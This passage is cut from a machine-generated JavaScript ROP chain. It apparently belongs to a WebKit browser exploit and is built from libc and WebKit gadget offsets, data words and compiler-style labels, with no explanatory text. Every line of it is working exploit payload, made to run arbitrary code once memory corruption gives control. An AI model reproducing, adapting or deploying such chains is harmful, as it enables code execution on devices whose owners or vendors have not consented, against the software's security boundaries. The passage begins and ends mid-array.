libc_base+764760, //pop rsi ropchain+176040, //L2720 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2720: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2722: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+176136, //L2723 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+176152, //L2724 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2723: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2724: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+176312, //L2728 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+176280, //L2726 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+176296, //L2727 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2725: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2726: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2727: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2728: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+176368, //L2730 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2730: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+176496, //L2732 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+176512, //L2733 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+176480, //L2731 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2731: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2732: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2733: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+176672, //L2737 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+176640, //L2735 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+176656, //L2736 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2734: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2735: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2736: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2737: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+176728, //L2739 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2739: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+176856, //L2741 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+176872, //L2742 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+176840, //L2740 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2740: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2741: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2742: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+177032, //L2746 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+177000, //L2744 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+177016, //L2745 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2743: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2744: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2745: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2746: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+177088, //L2748 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2748: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+177216, //L2750 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+177232, //L2751 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+177200, //L2749 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2749: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2750: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2751: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+177392, //L2756 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+177408, //L2757 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+177344, //L2753 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2753: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2754: db([0, 0]); // 0x0 set_gadget(libc_base+763368,); //pop rcx //L2755: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2756: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2757: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+177520, //L2758+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+177512, //L2758 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L2758: db([0, 0]); // 0x0 set_gadgets([ ropchain+177536, //L2758+24 ropchain+178280, //L2752 libc_base+764760, //pop rsi ropchain+177576, //L2759 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2759: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2761: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+177696, //L2764 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+177680, //L2762 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2762: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2764: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+177840, //L2767 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+177808, //L2765 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+177824, //L2766 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2765: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2766: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2767: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+177928, //L2769 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+764760 //pop rsi ]); //L2768: db([4294967295, 4294967295]); // -0x1 set_gadget(libc_base+759608,); //pop rax //L2769: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+177984, //L2770 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2770: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2772: db([24, 0]); // 0x18 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+178064, //L2774 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2774: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+178168, //L2775 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+178200, //L2777 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2775: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2776: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2777: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+346125, //setne al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+178272, //L2778 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2778: db([0, 0]); // 0x0 //L2752: set_gadgets([ libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+178400, //L2781 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+178416, //L2782 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+178384, //L2780 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2780: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2781: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2782: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+178528, //L2784 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+178576, //L2787 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+178544, //L2785 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2784: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2785: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2786: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2787: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+178688, //L2788+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+178680, //L2788 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L2788: db([0, 0]); // 0x0 set_gadgets([ ropchain+178704, //L2788+24 ropchain+178720, //L2783 libc_base+782311, //pop rsp ropchain+178736, //L2789 //L2783: libc_base+782311, //pop rsp ropchain+179216, //L2790 //L2789: //L2791: libc_base+764760, //pop rsi ropchain+178776, //L2792 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2792: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2794: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+178896, //L2797 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+178880, //L2795 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2795: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2797: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+179056, //L2801 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+179008, //L2798 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+179024, //L2799 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2798: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2799: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2800: db([1, 0]); // 0x1 set_gadget(libc_base+759608,); //pop rax //L2801: db([0, 0]); // 0x0 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+179112, //L2802 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2802: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2804: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+20307877, //mov [rax], rcx libc_base+764760, //pop rsi ropchain+179192, //L2805 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2805: db([0, 0]); // 0x0 set_gadgets([ libc_base+782311, //pop rsp ropchain+175896, //L2714 //L2790: libc_base+764760, //pop rsi ropchain+179256, //L2807 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2807: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2809: db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+179376, //L2812 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+179360, //L2810 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2810: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2812: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+179520, //L2815 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+179488, //L2813 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+179504, //L2814 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2813: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2814: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2815: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+179600, //L2816 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2816: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2818: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+179720, //L2821 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+179704, //L2819 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2819: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2821: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+179832, //L2822 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+179864, //L2824 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+179848, //L2823 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2822: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2823: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2824: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+835093, //sub rax, rcx ; sbb rdx, rcx libc_base+764760, //pop rsi ropchain+180008, //L2827 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+179992, //L2826 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2825: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); //pop r9 //L2826: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2827: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+180128, //L2828 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+180160, //L2830 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+180144, //L2829 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2828: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2829: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2830: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+180264, //L2831 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+180280, //L2832 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L2831: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2832: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+180400, //L2833 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+180384, //L2834 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2834: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2833: db([0, 0]); // 0x0 set_gadgets([ libc_base+764760, //pop rsi ropchain+180488, //L2836 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+764760, //pop rsi ropchain+180472, //L2835 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2835: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2836: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+180592, //L2837 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+180608, //L2838 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+568675 //pop r8 ]); //L2837: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2838: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+180728, //L2839 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+180712, //L2840 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+759608 //pop rax ]); //L2840: db([0, 0]); // 0x0 set_gadget(libc_base+782311,); //pop rsp //L2839: db([0, 0]); // 0x0 //__is_digit: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+180800, //L2842 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 webkit_base+568675 //pop r8 ]); //L2842: db([0, 0]); // 0x0 set_gadgets([ libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+180888, //L2843 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+180936, //L2846 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L2843: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2844: db([48, 0]); // 0x30 set_gadget(libc_base+144605,); //pop rdi //L2845: db([48, 0]); // 0x30 set_gadget(webkit_base+568675,); //pop r8 //L2846: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+181032, //L2848 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+181016, //L2847 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2847: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2848: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+181112, //L2849 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L2849: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L2851: db([16, 0]); // 0x10 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+181232, //L2854 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+181216, //L2852 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L2852: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2854: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+181392, //L2858 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+181360, //L2856 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+181376, //L2857 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2855: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2856: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2857: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2858: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+181448, //L2860 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2860: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+181576, //L2862 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+181592, //L2863 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+181560, //L2861 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2861: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2862: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2863: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+181752, //L2867 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+181720, //L2865 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+181736, //L2866 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2864: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L2865: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2866: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2867: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+181808, //L2869 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L2869: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+181936, //L2871 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+181952, //L2872 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+181920, //L2870 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2870: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L2871: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2872: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+182032, //L2873 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+182048, //L2874 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L2873: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2874: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+182160, //L2875 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+182192, //L2877 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+182176, //L2876 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L2875: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L2876: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L2877: db([0, 0]); // 0x0 set_gadgets([ 